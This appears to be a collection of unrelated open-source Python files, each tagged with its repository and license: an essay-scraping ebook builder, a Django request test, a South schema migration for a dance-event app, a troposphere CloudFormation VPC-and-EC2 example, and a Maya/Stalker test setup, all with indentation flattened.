book.title = "Paul Graham's Essays"
book.authors = ['Paul Graham']
page = urllib2.urlopen('http://www.paulgraham.com/articles.html').read()
soup = BeautifulSoup(page)
soup.prettify()
links = soup.findAll('table', {'width': '435'})[1].findAll('a')
sections = []
for link in links:
sections.append(addSection(link['href'], link.text))
book.sections = sections
book.make(book.title)
| norayr/pgessays | pgessays.py | Python | bsd-2-clause | 2,125 |
#from shoutrequest import ShoutRequest
from djangorequest import DjangoRequest
import json
from twisted.internet import task
from twisted.internet import reactor
mb = {"requestid":"AAAAA1", "requesttype":"get", "requesttimeout":10, "requestbody":{"selects": [{"name":"sweetspot.models.Locations", "label":"L", "cols":["boroughCode", "locationCode"]}, {"name":"sweetspot.models.Signs", "label":"S", "cols":["FtFromCurb", "locationCode"]}], "joins":[{"L.locationCode":"P-004958", "op":"eq"}, {"S.FtFromCurb":"9", "op":"eq"}, {"L.boroughCode":["M","B"], "op":"in"}]}}
def runEvery5Seconds():
print shoutRequest.getResults()
decoder = json.JSONEncoder()
requestid = mb["requestid"]
requesttimeout = mb["requesttimeout"]
requestbody = mb["requestbody"]
shoutRequest = DjangoRequest(format = "JSON", requestObj = requestbody, requesttimeout = requesttimeout, requestid = requestid)
if shoutRequest.isValidRequest():
print "request is valid"
gms = shoutRequest.createGenericModels()
else:
print mb, " is not a valid request"
#l = task.LoopingCall(runEvery5Seconds)
#l.start(2)
#reactor.run()
| psiCode/shoutserver | mysite/djangorequest_test.py | Python | bsd-2-clause | 1,094 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
ScheduledDance = orm['stepping_out.ScheduledDance']
Venue = orm['stepping_out.Venue']
for sd in ScheduledDance.objects.all():
v = Venue.objects.create(
name=sd.name,
banner=sd.banner,
description=sd.description,
website=sd.website,
weekday=sd.weekday,
weeks=sd.weeks,
dance_template=sd.dance_template
)
sd.dances.update(venue=v)
def backwards(self, orm):
"Write your backwards methods here."
ScheduledDance = orm['stepping_out.ScheduledDance']
Venue = orm['stepping_out.Venue']
for v in Venue.objects.all():
sd = ScheduledDance.objects.create(
name=v.name,
banner=v.banner,
description=v.description,
website=v.website,
weekday=v.weekday,
weeks=v.weeks,
dance_template=v.dance_template
)
v.dances.update(venue=sd)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'stepping_out.dance': {
'Meta': {'ordering': "('start', 'end')", 'object_name': 'Dance'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'djs': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'dj_for'", 'blank': 'True', 'through': u"orm['stepping_out.DanceDJ']", 'to': u"orm['stepping_out.Person']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'host_for'", 'blank': 'True', 'to': u"orm['stepping_out.Person']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canceled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'live_acts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['stepping_out.LiveAct']", 'symmetrical': 'False', 'through': u"orm['stepping_out.DanceLiveAct']", 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'scheduled_dance': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dances'", 'null': 'True', 'to': u"orm['stepping_out.ScheduledDance']"}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sites.Site']", 'symmetrical': 'False', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dances'", 'null': 'True', 'to': u"orm['stepping_out.Venue']"})
},
u'stepping_out.dancedj': {
'Meta': {'ordering': "('order', 'start', 'end')", 'object_name': 'DanceDJ'},
'dance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Dance']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Person']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.danceliveact': {
'Meta': {'ordering': "('order', 'start', 'end')", 'object_name': 'DanceLiveAct'},
'dance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Dance']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live_act': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.LiveAct']"}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.dancetemplate': {
'Meta': {'object_name': 'DanceTemplate'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sites.Site']", 'symmetrical': 'False', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'stepping_out.lesson': {
'Meta': {'ordering': "('start', 'end')", 'object_name': 'Lesson'},
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'dance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'lessons'", 'to': u"orm['stepping_out.Dance']"}),
'dance_included': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'teachers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['stepping_out.Person']", 'symmetrical': 'False', 'blank': 'True'})
},
u'stepping_out.lessontemplate': {
'Meta': {'object_name': 'LessonTemplate'},
'custom_price': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'dance_included': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lesson_templates'", 'null': 'True', 'to': u"orm['stepping_out.DanceTemplate']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.Location']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'student_price': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'stepping_out.liveact': {
'Meta': {'object_name': 'LiveAct'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'stepping_out.location': {
'Meta': {'object_name': 'Location'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'default': "'Seattle'", 'max_length': '100'}),
'custom_map_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'custom_map_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'neighborhood': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'state': ('django_localflavor_us.models.USStateField', [], {'default': "'WA'", 'max_length': '2'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'stepping_out.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
u'stepping_out.scheduleddance': {
'Meta': {'object_name': 'ScheduledDance'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.DanceTemplate']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'weekday': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'weeks': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "'1,2,3,4,5'", 'max_length': '9'})
},
u'stepping_out.venue': {
'Meta': {'object_name': 'Venue'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'dance_template': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stepping_out.DanceTemplate']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'weekday': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'weeks': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "'1,2,3,4,5'", 'max_length': '9'})
}
}
complete_apps = ['stepping_out']
symmetrical = True
| melinath/django-stepping-out | stepping_out/migrations/0016_scheduled_dance_to_venue.py | Python | bsd-2-clause | 17,560 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Converted from VPC_With_VPN_Connection.template located at:
# http://aws.amazon.com/cloudformation/aws-cloudformation-templates
from troposphere import Base64, FindInMap, GetAtt, Join, Output
from troposphere import Parameter, Ref, Tags, Template
from troposphere.autoscaling import Metadata
from troposphere.ec2 import PortRange, NetworkAcl, Route, \
VPCGatewayAttachment, SubnetRouteTableAssociation, Subnet, RouteTable, \
VPC, NetworkInterfaceProperty, NetworkAclEntry, \
SubnetNetworkAclAssociation, EIP, Instance, InternetGateway, \
SecurityGroupRule, SecurityGroup
from troposphere.policies import CreationPolicy, ResourceSignal
from troposphere.cloudformation import Init, InitFile, InitFiles, \
InitConfig, InitService, InitServices
t = Template()
t.add_version('2010-09-09')
t.set_description("""\
AWS CloudFormation Sample Template VPC_Single_Instance_In_Subnet: Sample \
template showing how to create a VPC and add an EC2 instance with an Elastic \
IP address and a security group. \
**WARNING** This template creates an Amazon EC2 instance. You will be billed \
for the AWS resources used if you create a stack from this template.""")
keyname_param = t.add_parameter(
Parameter(
'KeyName',
ConstraintDescription='must be the name of an existing EC2 KeyPair.',
Description='Name of an existing EC2 KeyPair to enable SSH access to \
the instance',
Type='AWS::EC2::KeyPair::KeyName',
))
sshlocation_param = t.add_parameter(
Parameter(
'SSHLocation',
Description=' The IP address range that can be used to SSH to the EC2 \
instances',
Type='String',
MinLength='9',
MaxLength='18',
Default='0.0.0.0/0',
AllowedPattern=r"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})",
ConstraintDescription=(
"must be a valid IP CIDR range of the form x.x.x.x/x."),
))
instanceType_param = t.add_parameter(Parameter(
'InstanceType',
Type='String',
Description='WebServer EC2 instance type',
Default='m1.small',
AllowedValues=[
't1.micro',
't2.micro', 't2.small', 't2.medium',
'm1.small', 'm1.medium', 'm1.large', 'm1.xlarge',
'm2.xlarge', 'm2.2xlarge', 'm2.4xlarge',
'm3.medium', 'm3.large', 'm3.xlarge', 'm3.2xlarge',
'c1.medium', 'c1.xlarge',
'c3.large', 'c3.xlarge', 'c3.2xlarge', 'c3.4xlarge', 'c3.8xlarge',
'g2.2xlarge',
'r3.large', 'r3.xlarge', 'r3.2xlarge', 'r3.4xlarge', 'r3.8xlarge',
'i2.xlarge', 'i2.2xlarge', 'i2.4xlarge', 'i2.8xlarge',
'hi1.4xlarge',
'hs1.8xlarge',
'cr1.8xlarge',
'cc2.8xlarge',
'cg1.4xlarge',
],
ConstraintDescription='must be a valid EC2 instance type.',
))
t.add_mapping('AWSInstanceType2Arch', {
't1.micro': {'Arch': 'PV64'},
't2.micro': {'Arch': 'HVM64'},
't2.small': {'Arch': 'HVM64'},
't2.medium': {'Arch': 'HVM64'},
'm1.small': {'Arch': 'PV64'},
'm1.medium': {'Arch': 'PV64'},
'm1.large': {'Arch': 'PV64'},
'm1.xlarge': {'Arch': 'PV64'},
'm2.xlarge': {'Arch': 'PV64'},
'm2.2xlarge': {'Arch': 'PV64'},
'm2.4xlarge': {'Arch': 'PV64'},
'm3.medium': {'Arch': 'HVM64'},
'm3.large': {'Arch': 'HVM64'},
'm3.xlarge': {'Arch': 'HVM64'},
'm3.2xlarge': {'Arch': 'HVM64'},
'c1.medium': {'Arch': 'PV64'},
'c1.xlarge': {'Arch': 'PV64'},
'c3.large': {'Arch': 'HVM64'},
'c3.xlarge': {'Arch': 'HVM64'},
'c3.2xlarge': {'Arch': 'HVM64'},
'c3.4xlarge': {'Arch': 'HVM64'},
'c3.8xlarge': {'Arch': 'HVM64'},
'g2.2xlarge': {'Arch': 'HVMG2'},
'r3.large': {'Arch': 'HVM64'},
'r3.xlarge': {'Arch': 'HVM64'},
'r3.2xlarge': {'Arch': 'HVM64'},
'r3.4xlarge': {'Arch': 'HVM64'},
'r3.8xlarge': {'Arch': 'HVM64'},
'i2.xlarge': {'Arch': 'HVM64'},
'i2.2xlarge': {'Arch': 'HVM64'},
'i2.4xlarge': {'Arch': 'HVM64'},
'i2.8xlarge': {'Arch': 'HVM64'},
'hi1.4xlarge': {'Arch': 'HVM64'},
'hs1.8xlarge': {'Arch': 'HVM64'},
'cr1.8xlarge': {'Arch': 'HVM64'},
'cc2.8xlarge': {'Arch': 'HVM64'},
})
t.add_mapping('AWSRegionArch2AMI', {
'us-east-1': {'PV64': 'ami-50842d38', 'HVM64': 'ami-08842d60',
'HVMG2': 'ami-3a329952'},
'us-west-2': {'PV64': 'ami-af86c69f', 'HVM64': 'ami-8786c6b7',
'HVMG2': 'ami-47296a77'},
'us-west-1': {'PV64': 'ami-c7a8a182', 'HVM64': 'ami-cfa8a18a',
'HVMG2': 'ami-331b1376'},
'eu-west-1': {'PV64': 'ami-aa8f28dd', 'HVM64': 'ami-748e2903',
'HVMG2': 'ami-00913777'},
'ap-southeast-1': {'PV64': 'ami-20e1c572', 'HVM64': 'ami-d6e1c584',
'HVMG2': 'ami-fabe9aa8'},
'ap-northeast-1': {'PV64': 'ami-21072820', 'HVM64': 'ami-35072834',
'HVMG2': 'ami-5dd1ff5c'},
'ap-southeast-2': {'PV64': 'ami-8b4724b1', 'HVM64': 'ami-fd4724c7',
'HVMG2': 'ami-e98ae9d3'},
'sa-east-1': {'PV64': 'ami-9d6cc680', 'HVM64': 'ami-956cc688',
'HVMG2': 'NOT_SUPPORTED'},
'cn-north-1': {'PV64': 'ami-a857c591', 'HVM64': 'ami-ac57c595',
'HVMG2': 'NOT_SUPPORTED'},
'eu-central-1': {'PV64': 'ami-a03503bd', 'HVM64': 'ami-b43503a9',
'HVMG2': 'ami-b03503ad'},
})
ref_stack_id = Ref('AWS::StackId')
ref_region = Ref('AWS::Region')
ref_stack_name = Ref('AWS::StackName')
VPC = t.add_resource(
VPC(
'VPC',
CidrBlock='10.0.0.0/16',
Tags=Tags(
Application=ref_stack_id)))
subnet = t.add_resource(
Subnet(
'Subnet',
CidrBlock='10.0.0.0/24',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id)))
internetGateway = t.add_resource(
InternetGateway(
'InternetGateway',
Tags=Tags(
Application=ref_stack_id)))
gatewayAttachment = t.add_resource(
VPCGatewayAttachment(
'AttachGateway',
VpcId=Ref(VPC),
InternetGatewayId=Ref(internetGateway)))
routeTable = t.add_resource(
RouteTable(
'RouteTable',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id)))
route = t.add_resource(
Route(
'Route',
DependsOn='AttachGateway',
GatewayId=Ref('InternetGateway'),
DestinationCidrBlock='0.0.0.0/0',
RouteTableId=Ref(routeTable),
))
subnetRouteTableAssociation = t.add_resource(
SubnetRouteTableAssociation(
'SubnetRouteTableAssociation',
SubnetId=Ref(subnet),
RouteTableId=Ref(routeTable),
))
networkAcl = t.add_resource(
NetworkAcl(
'NetworkAcl',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id),
))
inBoundPrivateNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundHTTPNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='100',
Protocol='6',
PortRange=PortRange(To='80', From='80'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
inboundSSHNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundSSHNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='101',
Protocol='6',
PortRange=PortRange(To='22', From='22'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
inboundResponsePortsNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundResponsePortsNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='102',
Protocol='6',
PortRange=PortRange(To='65535', From='1024'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundHTTPNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundHTTPNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='100',
Protocol='6',
PortRange=PortRange(To='80', From='80'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundHTTPSNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundHTTPSNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='101',
Protocol='6',
PortRange=PortRange(To='443', From='443'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundResponsePortsNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundResponsePortsNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='102',
Protocol='6',
PortRange=PortRange(To='65535', From='1024'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
subnetNetworkAclAssociation = t.add_resource(
SubnetNetworkAclAssociation(
'SubnetNetworkAclAssociation',
SubnetId=Ref(subnet),
NetworkAclId=Ref(networkAcl),
))
instanceSecurityGroup = t.add_resource(
SecurityGroup(
'InstanceSecurityGroup',
GroupDescription='Enable SSH access via port 22',
SecurityGroupIngress=[
SecurityGroupRule(
IpProtocol='tcp',
FromPort='22',
ToPort='22',
CidrIp=Ref(sshlocation_param)),
SecurityGroupRule(
IpProtocol='tcp',
FromPort='80',
ToPort='80',
CidrIp='0.0.0.0/0')],
VpcId=Ref(VPC),
))
instance_metadata = Metadata(
Init({
'config': InitConfig(
packages={'yum': {'httpd': []}},
files=InitFiles({
'/var/www/html/index.html': InitFile(content=Join('\n',
[
'<img \
src="https://s3.amazonaws.com/cloudformation-examples/\
cloudformation_graphic.png" alt="AWS CloudFormation Logo"/>',
'<h1>\
Congratulations, you have successfully launched the AWS CloudFormation sample.\
</h1>']),
mode='000644',
owner='root',
group='root'),
'/etc/cfn/cfn-hup.conf': InitFile(content=Join('',
['[main]\n',
'stack=',
ref_stack_id,
'\n',
'region=',
ref_region,
'\n',
]),
mode='000400',
owner='root',
group='root'),
'/etc/cfn/hooks.d/cfn-auto-reloader.conf': InitFile(
content=Join('',
['[cfn-auto-reloader-hook]\n',
'triggers=post.update\n',
'path=Resources.WebServerInstance.\
Metadata.AWS::CloudFormation::Init\n',
'action=/opt/aws/bin/cfn-init -v ',
' --stack ',
ref_stack_name,
' --resource WebServerInstance ',
' --region ',
ref_region,
'\n',
'runas=root\n',
]))}),
services={
'sysvinit': InitServices({
'httpd': InitService(
enabled=True,
ensureRunning=True),
'cfn-hup': InitService(
enabled=True,
ensureRunning=True,
files=[
'/etc/cfn/cfn-hup.conf',
'/etc/cfn/hooks.d/cfn-auto-reloader.conf'
])})})}))
instance = t.add_resource(
Instance(
'WebServerInstance',
Metadata=instance_metadata,
ImageId=FindInMap(
'AWSRegionArch2AMI',
Ref('AWS::Region'),
FindInMap(
'AWSInstanceType2Arch',
Ref(instanceType_param),
'Arch')),
InstanceType=Ref(instanceType_param),
KeyName=Ref(keyname_param),
NetworkInterfaces=[
NetworkInterfaceProperty(
GroupSet=[
Ref(instanceSecurityGroup)],
AssociatePublicIpAddress='true',
DeviceIndex='0',
DeleteOnTermination='true',
SubnetId=Ref(subnet))],
UserData=Base64(
Join(
'',
[
'#!/bin/bash -xe\n',
'yum update -y aws-cfn-bootstrap\n',
'/opt/aws/bin/cfn-init -v ',
' --stack ',
Ref('AWS::StackName'),
' --resource WebServerInstance ',
' --region ',
Ref('AWS::Region'),
'\n',
'/opt/aws/bin/cfn-signal -e $? ',
' --stack ',
Ref('AWS::StackName'),
' --resource WebServerInstance ',
' --region ',
Ref('AWS::Region'),
'\n',
])),
CreationPolicy=CreationPolicy(
ResourceSignal=ResourceSignal(
Timeout='PT15M')),
Tags=Tags(
Application=ref_stack_id),
))
ipAddress = t.add_resource(
EIP('IPAddress',
DependsOn='AttachGateway',
Domain='vpc',
InstanceId=Ref(instance)
))
t.add_output(
[Output('URL',
Description='Newly created application URL',
Value=Join('',
['http://',
GetAtt('WebServerInstance',
'PublicIp')]))])
print(t.to_json())
| ikben/troposphere | examples/VPC_single_instance_in_subnet.py | Python | bsd-2-clause | 14,764 |
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import tempfile
import unittest
import pymel.core as pm
from stalker import (db, User, Repository, Status, FilenameTemplate, Structure,
StatusList, ImageFormat, Project, Task, Sequence, Shot,
Type, Version)
from anima.env.mayaEnv import previs, Maya
class ShotSplitterTestCase(unittest.TestCase):
"""tests the anima.env.maya.previs.ShotSplitter class
"""
def setUp(self):
"""create test data
"""
database_url = 'sqlite:///:memory:'
db.setup({'sqlalchemy.url': database_url})
db.init()
self.temp_repo_path = tempfile.mkdtemp()
self.user1 = User(
name='User 1',
login='User 1',
email='[email protected]',
password='12345'
)
self.repo1 = Repository(
name='Test Project Repository',
linux_path=self.temp_repo_path,
windows_path=self.temp_repo_path,
osx_path=self.temp_repo_path
)
self.status_new = Status.query.filter_by(code='NEW').first()
self.status_wip = Status.query.filter_by(code='WIP').first()
self.status_comp = Status.query.filter_by(code='CMPL').first()
self.task_template = FilenameTemplate(
name='Task Template',
target_entity_type='Task',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.asset_template = FilenameTemplate(
name='Asset Template',
target_entity_type='Asset',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.shot_template = FilenameTemplate(
name='Shot Template',
target_entity_type='Shot',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.sequence_template = FilenameTemplate(
name='Sequence Template',
target_entity_type='Sequence',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
